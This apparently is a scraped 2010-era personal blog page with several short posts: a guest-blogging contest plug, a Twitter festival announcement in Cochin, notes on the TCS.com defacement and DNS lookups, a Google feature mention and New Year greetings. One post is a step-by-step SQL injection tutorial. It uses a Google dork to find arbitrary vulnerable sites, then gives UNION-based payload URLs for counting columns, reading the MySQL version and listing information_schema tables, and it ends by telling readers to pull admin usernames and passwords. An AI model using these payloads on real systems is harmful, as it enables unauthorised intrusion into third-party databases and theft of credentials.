Get extra $s from BlogEngage at this expensive romantic month
It’s Feburary, the month of romance. It’s the shortest month of the year, but yet you end up in spending the most. Yes, everyone wish to make their valentine happy at this month and no one wants money to hinder their way in seeing their lover with a smile. Well, then hurry up. BlogEngage is running a $500 USD Guest-blogging contest. Just scribble out something on blogging with a true intention to enjoy the fun in a contest. Am sure, you will end up in writing a beautiful post. Still not ready to participate. Don’t just the opportunity let off. BlogEngage is a big platform for the bloggers and so I am sure all participants will see the feast.
So let’s meet the stunning sponsors who made this contest possible :::::
The Current Best of the Guest Blogger Sponsors
SEO and SEM services
Wholesale Greenhouse Supplies
Hydroponics Equipment
Greenhouse Equipment
Greenhouses
Garden Gifts
Gardening Articles
SEO Agency UK
Deal of the day
At last, but not the least. Ya, I know you people have guessed it. Yes, I am participating in this stunning contest. You can find my post at here
Cochin Twestival 2010
Cochin Twestival 2010 will be held on March 25th, 2010 from 5 PM to 8 PM at Somewhere Else Cafe. Cochin Twestival is a mega tweet-up with lots of things added.
RSVP for Cochin Twestival
Hearing the word ‘Twestival’ for the first time?
It is a mega tweet-up with lots of things added. In short, it is a Twitter Festival. Twitter Festivals or Twestivals happen all around the globe once a year. There are basically two types of Twestivals: Twestival Global & Twestival Local. Twestival Global is one day, one cause all around the world and Twestival Local takes place over a weekend where cities are encouraged to support a local cause. Both versions have international momentum, but the real power of Twestival is when everything comes together on one day, giving focus to an important cause, the cause being different every year.
Venue
Twestival Cochin 2010 will be held at Somewhere Else Cafe. A map to the location is available at Twitter Kerala
Registration
You can register for the event in the Facebook Event Page.
How to perform a SQL injection?
First of all we must know what a ‘SQL injection’ is. So here is the wikipedia definition – ‘ SQL injection is a code injection technique that exploits a security vulnerability occuring in the database layer of an application ‘ . Here we will confine ourselves to SQL injections in web sites.
Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘. If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.
1. Check the vulnerability by adding ‘ to the above link.
If you get an error message it means that the site is vulnerable to SQL injection.
Now you can be damn sure that the site is vulnerable to SQL injection.
2. Find out the number of columns
To find number of columns we use statement ORDER BY
Just increment the number until we get an error.
http://www.site.com/abc.php?id=5 order by 1– <– no error
http://www.site.com/abc.php?id=5 order by 2– <– no error
http://www.site.com/abc.php?id=5 order by 3– <– no error
http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we get some message like Unknown column ‘4’ )
So we can conclude that the table have 4 columns
3. Check whether UNION function works or not
http://www.site.com/abc.php?id=5 union all select 1,2,3–
We will get a number on the screen. Lets say we get the number 2 at this step.
4. Check for MySQL version by replacing 2 in the above step by version()
http://www.site.com/abc.php?id=5 union all select 1,version(),3–
Now you can find the version from the site and only if it is found to above 5, we can continue to the next steps.
// If the version is lower than 5, then we will have to a adopt some new methods which I will explain in some future post //
5. Use information_schema
Why do we use information_schema? The reason is very simple – ‘In mySQL 5 and higher versions, information_schema holds all tables and columns in the database’.
To get tables we use table_name and information_schema.tables
http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables–
6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.
//PLEASE DONT USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES
TCS.com hack exposes difference between Google public DNS and open DNS services
TCS.com belonging to Tata Consulatcny Services was hacked earlier todaya and it is claimed to be a attack over a DNS loophole.
Using nslookup, the diiference between Google public DNS and open DNS were studied.
On using nslookup for openDNS the result for both tcs.com and http://www.tcs.com were the same.
On using nslookup for Google public DNS the result for both tcs.com and http://www.tcs.com were different.
For http://www.tcs.com the Address was 205.178.152.154 while for tcs.com it was 216.15.200.140.
Thanks to Albins for pointing out the difference.
Official site of Tata Consultancy Services gets hacked by a French cracker
The website http://www.tcs.com which belongs to India’s IT giant Tata Consultancy Services gets hacked by a French hacker. When I write this post, the TCS group have not still resolved the problem. Itx more likely that it is not a web software hack,but an attack through DNS loophole.
If you visit TCS.com you will get a screenshot as shown below, telling that they have put up the domain name for sale.
Try out Google Experimental Search
‘Google Experimental Search’ !!!!!! Hearing it first for the time. It is another cool Google feature launched in May, 2007. Many believed that it is going to redefine the present search engines. Basicaly it has three provisons
- Google Social Search
- Keyboard Shortcuts
- Accessible View
You can try it at http://www.google.com/experimental/
Happy New Year to all Readers
Itx 6pm of January 1st,2010. Yes, I have been late in wishing you guys a Happy New Year.I take this opportunity to thank all our elite readers for your support during the year 2009 and wishing you all a very HAPPY NEW YEAR.